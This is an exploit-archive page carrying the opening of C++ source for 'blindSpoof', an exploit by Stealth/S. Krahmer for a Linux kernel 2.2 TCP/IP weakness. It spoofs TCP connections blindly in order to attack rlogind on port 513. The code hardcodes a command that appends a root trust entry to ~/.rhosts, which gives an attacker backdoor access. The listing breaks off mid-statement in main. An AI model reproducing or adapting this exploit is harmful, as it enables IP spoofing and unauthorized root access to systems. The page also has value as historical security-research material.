[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux Kernel 2.2 (TCP/IP Weakness) Exploit
# Published : 2001-01-02
# Author : Stealth
# Previous Title : wu-ftpd 2.6.0 Remote Format Strings Exploit
# Next Title : HP OpenView OmniBack II Generic Remote Exploit
/**
*** Exploit for the 2.2 linux-kernel TCP/IP weakness.
*** (C) 1999 by S. Krahmer.
*** THERE IS ABSOLUTELY NO WARRANTY. YOU USE IT AT YOUR OWN RSIK!
*** THIS PROGRAM IS LICESED UNDER THE GPL and belongs to a security-
*** advisory of team teso. You should get the full advisory with paper
*** on either
*** http://www.cs.uni-potsdam.de/homepages/students/linuxer or
*** http://teso.scene.at
***
*** The bugdiscovery and the exploit is due to:
***
*** Stealth http://www.kalug.lug.net/stealth
*** S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linxuer
***
*** c++ blindSpoof.cc -lusi++ -lpcap (this is LINUX source!)
*** Libusi++ is available on my homepage.
*** Achtung: Gehen Sie nicht in den 100 Meilen tiefen Wald! ;-)
**/
#include <stdio.h>
#include <iostream>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <usi++/usi++.h>
#define XPORT 513
// may be changed, my best results were around 2000,
// but also diffs of > 5000 can happen :)
// change it it really not works
#define MAXPACK 3000
// define this if you want to exploit rlogind
// if not, you will just spoof a connection to XPORT
#define EXPLOIT_RLOGIND
// uses eth0 for packet-capturing!
TCP *pingVictum(char *, char *, char *);
int printInfo(TCP *);
bool wrongPacket(TCP *, TCP *);
int main(int argc, char **argv)
{
// yes, script-kidz! this is hardcoded to prevent you from usage.
const char *remoteUser = "stealth",
*localUser = "stealth",
*command = "echo liane root>>~/.rhostsn";
char sbuf[1000];
if (argc < 4) {
printf("Usage %s [destination-IP] [source-IP] [spoofed-IP]n", argv[0]);
exit(1);
}
cout<<"blindSpoof-exploit by S. Krahmern"
"http://www.cs.uni-potsdam.de/homepages/students/linuxernn";
// would be connect()
TCP *conn = pingVictum(argv[1], argv[2], argv[3]);
#ifdef EXPLOIT_RLOGIND
conn->set_flags(0);
sprintf(sbuf, "